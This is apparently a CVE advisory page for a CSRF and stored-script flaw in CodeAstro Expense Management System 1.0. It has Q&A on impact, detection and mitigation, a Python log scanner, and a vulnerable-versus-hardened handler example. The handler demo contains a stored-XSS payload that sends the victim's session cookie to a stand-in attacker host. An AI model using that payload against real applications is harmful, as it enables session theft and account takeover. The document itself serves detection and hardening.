CVE-2025-6478
BaseFortify
Publication date: 2025-06-22
Last updated on: 2026-04-29
Assigner: VulDB
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| codeastro | expense_management_system | 1.0 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-352 | The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor. |
| CWE-862 | The product does not perform an authorization check when an actor attempts to access a resource or perform an action. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-6478 is a Cross-Site Request Forgery (CSRF) vulnerability in CodeAstro Expense Management System 1.0; the record lists CWE-352 (CSRF) and CWE-862 (missing authorization). The application accepts a state-changing request, such as an 'Add Expense' submission, on the strength of the session cookie alone, so an attacker can host a page or link that submits that form from the browser of a logged-in user: the browser attaches the victim's cookie and the entry is created without the victim's consent. The published analysis additionally reports that a JavaScript payload submitted through the expense form this way is stored and executes when the victim later views the Manage Expenses page, which can expose the session cookie and lead to account takeover. [1, 2]
How can this vulnerability impact me?
An attacker who can get you to open a crafted page while you are logged in to the expense management system can perform actions in your name, such as adding fraudulent expense entries, without your knowledge. Because the same form can also carry stored JavaScript, any user who later views the affected page may have their session cookie stolen, which can lead to account takeover. The result is a loss of integrity for the expense data and of confidentiality for the affected accounts. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
A forged request arrives from the victim's own browser with a valid session cookie, so it cannot be told apart from a legitimate one by source address or cookie alone. What a cross-site submission cannot forge are the browser-set request headers: look for POST requests to the 'Add Expense' handler whose Origin or Referer header points to a host other than the application, whose Sec-Fetch-Site header is 'cross-site', or that carry no Referer at all (a weak signal, since privacy settings also strip it). At the application layer, review newly created expense entries for script or event-handler markup, and look for expense submissions that were not preceded by a GET of the form from the same session. No specific detection commands or signatures are currently documented for this vulnerability. [1, 2]
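The Referer/Origin check described above, applied to web-server access logs, as an added example that is not part of the original page or of the CodeAstro project. The handler path '/add_expense.php', the deployment hostname and the log lines are assumptions constructed for the illustration; the advisory names only the 'Add Expense' form.

```python
"""Flag likely CSRF submissions to a state-changing endpoint in Apache/nginx
combined-format access logs.  Added example; endpoint path, hostname and the
sample log lines are constructed, not taken from the CVE record."""
import re
from urllib.parse import urlsplit

APP_HOST = "expenses.example.internal"          # assumed hostname of the deployment
# Assumed path of the 'Add Expense' handler; extend the set for other state-changing actions.
STATE_CHANGING = {("POST", "/add_expense.php")}

# One combined-format line: ip ident user [ts] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def classify(line):
    """Return None for a benign line, otherwise a short reason string."""
    m = LOG_RE.match(line)
    if not m:
        return None                                  # not a parseable access-log line
    method, path = m["method"], urlsplit(m["path"]).path
    if (method, path) not in STATE_CHANGING:
        return None                                  # only state-changing requests matter
    referer = m["referer"]
    if referer in ("", "-"):
        # A browser submitting the app's own form normally sends a Referer; its absence
        # is a weak signal because Referrer-Policy or privacy settings can strip it too.
        return "missing referer"
    ref_host = urlsplit(referer).hostname
    if ref_host != APP_HOST:
        return f"cross-site referer: {ref_host}"     # the form was submitted from another site
    return None


def scan(lines):
    """Return (client_ip, reason) for every flagged line, in log order."""
    hits = []
    for line in lines:
        reason = classify(line)
        if reason:
            hits.append((LOG_RE.match(line)["ip"], reason))
    return hits


# Constructed sample log: two legitimate requests, then two that look like CSRF.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Jun/2025:10:00:00 +0000] "GET /manage_expenses.php HTTP/1.1" 200 4120 '
    '"http://expenses.example.internal/index.php" "Mozilla/5.0"',
    '10.0.0.5 - - [22/Jun/2025:10:00:07 +0000] "POST /add_expense.php HTTP/1.1" 302 0 '
    '"http://expenses.example.internal/add_expense.php" "Mozilla/5.0"',
    '203.0.113.7 - - [22/Jun/2025:10:03:41 +0000] "POST /add_expense.php HTTP/1.1" 302 0 '
    '"http://attacker.example/lure.html" "Mozilla/5.0"',
    '198.51.100.4 - - [22/Jun/2025:10:04:02 +0000] "POST /add_expense.php HTTP/1.1" 302 0 '
    '"-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(f"{ip}\t{reason}")
```

The access log does not contain the POST body, so the stored-script half of the report (markup in the item or description fields) has to be checked in the application's own request logging or directly in the expenses table. A cross-site Referer on a state-changing request is strong evidence on its own; a missing Referer should be correlated with the session's preceding requests before raising an alert.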
What immediate steps should I take to mitigate this vulnerability?
No countermeasure or vendor fix is documented for this issue [2], so the first step is to restrict access to the affected CodeAstro Expense Management System 1.0 (for example, to an internal network or VPN) until a patched version is available, or to replace it. If the application must stay in service, the deployment can be hardened in line with the recorded weaknesses: add a per-session anti-CSRF token to every state-changing form and reject requests that do not echo it back; reject state-changing requests whose Origin or Referer header is not the application's own origin; set the session cookie with the SameSite attribute so it is not attached to cross-site form posts; and HTML-encode expense fields when the Manage Expenses page renders them so a stored script payload cannot execute. Educate users not to open untrusted links while logged in, and review the expenses table for entries nobody remembers creating.
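The two server-side checks recommended above, the Origin check and the synchronizer token, next to the unprotected handler the advisory describes, as an added example that is not CodeAstro's code. The request and session objects are plain dictionaries standing in for a web framework, and the field names, path and origin are assumptions made for the illustration.

```python
"""Vulnerable versus hardened 'Add Expense' handler.  Added example using
stand-in request/session dictionaries; names and paths are assumptions."""
import hmac
import html
import secrets
from urllib.parse import urlsplit

APP_ORIGIN = "https://expenses.example.internal"   # assumed origin of the deployment


def issue_csrf_token(session):
    """Create the per-session token once; the form embeds it as a hidden field."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def _origin_of(url):
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}"


def add_expense_vulnerable(session, request, store):
    """The pattern CVE-2025-6478 describes: any POST carrying a valid session is honoured."""
    if "user_id" not in session:
        return 401, "login required"
    store.append({"user": session["user_id"],
                  "item": request["form"]["item"],
                  "amount": request["form"]["amount"]})
    return 302, "/manage_expenses.php"


def add_expense_hardened(session, request, store):
    if "user_id" not in session:
        return 401, "login required"              # authenticated user only

    # 1. The browser sets Origin (or Referer) itself; a page on another site cannot forge it.
    src = request["headers"].get("Origin") or request["headers"].get("Referer")
    if src is None or _origin_of(src) != APP_ORIGIN:
        return 403, "cross-site request rejected"

    # 2. Synchronizer token: must match the one bound to this session, compared in constant time.
    expected = session.get("csrf_token")
    submitted = request["form"].get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, submitted):
        return 403, "missing or invalid csrf token"

    store.append({"user": session["user_id"],
                  "item": request["form"]["item"],
                  "amount": request["form"]["amount"]})
    return 302, "/manage_expenses.php"


def render_manage_expenses(store):
    """Encode on output so a stored script payload is displayed as text, not executed."""
    rows = "".join(
        f"<tr><td>{html.escape(str(e['item']))}</td><td>{html.escape(str(e['amount']))}</td></tr>"
        for e in store
    )
    return f"<table>{rows}</table>"


if __name__ == "__main__":
    session = {"user_id": 7}
    token = issue_csrf_token(session)
    # Constructed forged request: cross-site origin, no token, but the victim's session.
    forged = {"headers": {"Origin": "https://attacker.example"},
              "form": {"item": "<script>fetch('https://attacker.example/?c='+document.cookie)</script>",
                       "amount": "1"}}
    legit = {"headers": {"Origin": APP_ORIGIN},
             "form": {"item": "Taxi", "amount": "12.50", "csrf_token": token}}
    for handler in (add_expense_vulnerable, add_expense_hardened):
        store = []
        print(handler.__name__, handler(session, forged, store), len(store), "row(s) written")
    store = []
    print("legit:", add_expense_hardened(session, legit, store), render_manage_expenses(store))
```

The Origin check alone stops the forged post; the token is kept as well because older or unusual clients may omit Origin on same-origin form posts, and the token does not depend on any header. A SameSite=Lax or Strict attribute on the session cookie adds a third, browser-enforced layer, and `render_manage_expenses` shows the output encoding that keeps a stored payload from running on the Manage Expenses page.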